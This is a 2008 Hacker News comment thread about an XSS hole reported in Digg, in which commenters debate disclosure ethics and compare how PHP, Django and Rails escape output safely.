Hacker News new | comments | show | ask | jobs | submit login
How I hacked Digg (phoboslab.org)
77 points by sant0sk1 on June 4, 2008 | hide | past | web | favorite | 34 comments



I like how people that write these types of stories always justify it as trying to help out... "In the hope that digg would now listen, I sent them a second email."

So digg was supposed to jump on this problem and not worry about anything else apparently.

It always seemed akin to saying

"I saw an unlocked vehicle today and I think its important that all vehicles remain locked. Since they didn't come running out when I told them to lock the car, I put it in neutral and let it roll down a hill so that they will now heed the warning"

While warning about possible vulnerabilities is helpful I have a hard time believing exploiting them is as well.


"So digg was supposed to jump on this problem and not worry about anything else apparently."

Quite frankly, yes they should. If you have an XSS hole in your web application your other user-facing security measures are worthless. If you're a social application of any sort it's even worse; you're just asking to be hit by a worm.

XSS is a Big Deal. XSS holes also really easy to find, so if a security researcher spots one it's not unlikely that a Bad Guy will find them as well.


A better analogy would be "I saw an unlocked vehicle today and I think its important that all vehicles remain locked. Since they didn't come running out when I told them to lock the car, I opened the car and left a note on the dashboard stating I'd been in the car."


I disagree. I think the better analogy woudl be: "I saw an unlocked vehicle today and I think its important that all vehicles remain locked. Since they didn't come running out when I told them to lock the car, I [opened] the car and left a note on the dashboard stating I'd been in the car."

"And then I went into the bad part of town and distributed fliers all around about how the car at the corner of Main and Screwed had been left unlocked for a while and how it had a great stereo and iPod in it."


Still a bit off. "[going] into the bad part of town" would imply he went on some devious message board and there released the information with a flashy heading.


An unlocked car only leaves the owner vulnerable to break-ins. This is more like noticing that Honda Civics can't be properly locked, and leaving a note on the dashboard of each and every one, so that Honda will experience pressure to fix the problem.


The full-disclosure community used to believe in this philosophy but for different reasons. They were trying to disclose the bug as a form of motivation with little regard to what else the company was working on. I suspect this message is not well understood now and the notion of full-disclosure being good is all that's left.


Your example does make sense, but in the case of Digg, its not a car, but a careless air carrier.


Reminds me of one of my all-time favorite cartoons: "Too Much Coffee Man, Doing Your Part"

http://tmcm.com/comics/webcomics/092_yourpart


a better analogy would be: your car may be locked but other people have keys that unlocks your car.then someone proves it by unlocking the car with his key


lol, liking your analogy :)


It does seem like a juvenile mentality, but seriously, fuck digg.


While I support full-disclosure, I don't think the author acted responsibly. He didn't give them enough time to respond, he didn't make any extra effort to contact digg's engineers and he also very publically bragged about it.

He didn't try to act modest and he used the buzzword 'hack' which appeals more to non-technical than to technical people. Publicity stunt if you ask me.


You seem surprised. Digg is one of the most popular sites on the Internet; the guy is (rightfully) proud that he can make it break horribly.


"Publicity stunt if you ask me."

For sure, but isn't everything on Digg a publicity stunt?


Agreed. A couple of weeks as a bare minimum, to give engineers a chance to make fixes and test thoroughly.


This is exactly what happens when you get a bit too excited about mixing presentation and logic. It's easy for "$foo" to slip into the HTML, and then your site gets hacked. This isn't really a PHP problem, but PHP certainly goes out of its way to encourage you to write bad code like this.


If you ask me, mixing presentation and logic is the core of most web development. They just missed a lot of opportunities for sanitizing data.

I also don't see how PHP goes 'out of its way'. It doesn't do anything, neither do most other web languages, you build or use existing frameworks and libraries to help with such tasks.


Here's how to safely output a variable in PHP:

<?php echo htmlspecialchars($name); ?>

Here's how to do the same thing in Django:

{{ name }}

That's the thing that bugs me most about PHP: it's not even a productive templating language!


I didn't realize Django is a language. Lets not compare frameworks to languages.


I personally think PHP it blurs the line between a language and framework. The "framework" part is the 20,000 builtin functions and the mechanism it provides for executing code as part of a dynamic web request.

In any case, my intent wasn't to compare Django to PHP, it was to point out that PHP's default way of outputting things really does make it inconvenient to write secure code - hence answering the parent post that argued that poor security had nothing to do with the language used.


Django is a framework, but it also has a language for writing templates, which is what the example above is written in.


You are comparing apples to oranges. Django is a framework built on Python. Python doesn't provide anything to escape strings. I'm sure there are also PHP frameworks and templating languages which make this very easy.

I realize I'm playing devil's advocate because I love Python, but you shouldn't put blame nor give credit where it isn't due.



Here you go:

function o($name) { echo htmlspecialchars($name); }

o($name);


You still need to do this:

<?php o($name); ?>

I've used this exact function in my own code, though I call it "h". Really sucks that we have to do this - not to mention that PHP's global namespace for functions means it's better to have long names that are more likely not to clash with third party code.


Actually you can use the <?= syntax to make it even more concise:

function o($name) { return(htmlspecialchars($name));}

<?=o($name)?>

which lo, and behold, looks a lot like the rails candidate below.


You can't write code for redistribution like that though as most PHP installations have that option disabled since ti inteferes with XML processing instructions.


And in Rails

<%= h(@var) %>


Who cares about digg? The site is going downhill, thanks to idiots posting "news" about their latest trip to WalMart and 10 reasons to hate Bush.


You've inspired me for some reason to defend the site (I'll admit to bias, check my profile). Digg is very highly trafficked site, and the content might not be to the liking of the people here, but it started just like most of the companies that inspire everyone here that I've interacted with. Along the way it's done some cool stuff, created jobs for coders and inspired a raft of imitators.

Don't know why you inspired me to speak up.

And concerning the current problem, avoiding XSS and CSRF holes demand vigilance, especially with the many, many demands put on programmers at startups. Perhaps only with php, but I think programmers are often clever enough to work around almost any constraints, and sometimes they see security as a constraint. Digg always attracted users interested in proving their mettle by finding security holes, and as a result the developers are pretty vigilant about fixing holes.

Concerning the content of digg, well, it's an adventure ;-). As it's grown, it's left lots of room in its wake for other (maybe better) communities to develop.


You only found 10 reasons to hate Bush there.

I'm up to 182 and counting. I believe the subject is a total obsession with many of the "contributors" to that site.


Oh!...we have ALL soooo wanted to hack digg, don't get me started on digg...see if I had a.....


I thought the title of the article should read "How I cracked Digg". Go away cracker!




Guidelines | FAQ | Support | API | Security | Lists | Bookmarklet | Legal | Apply to YC | Contact

Search: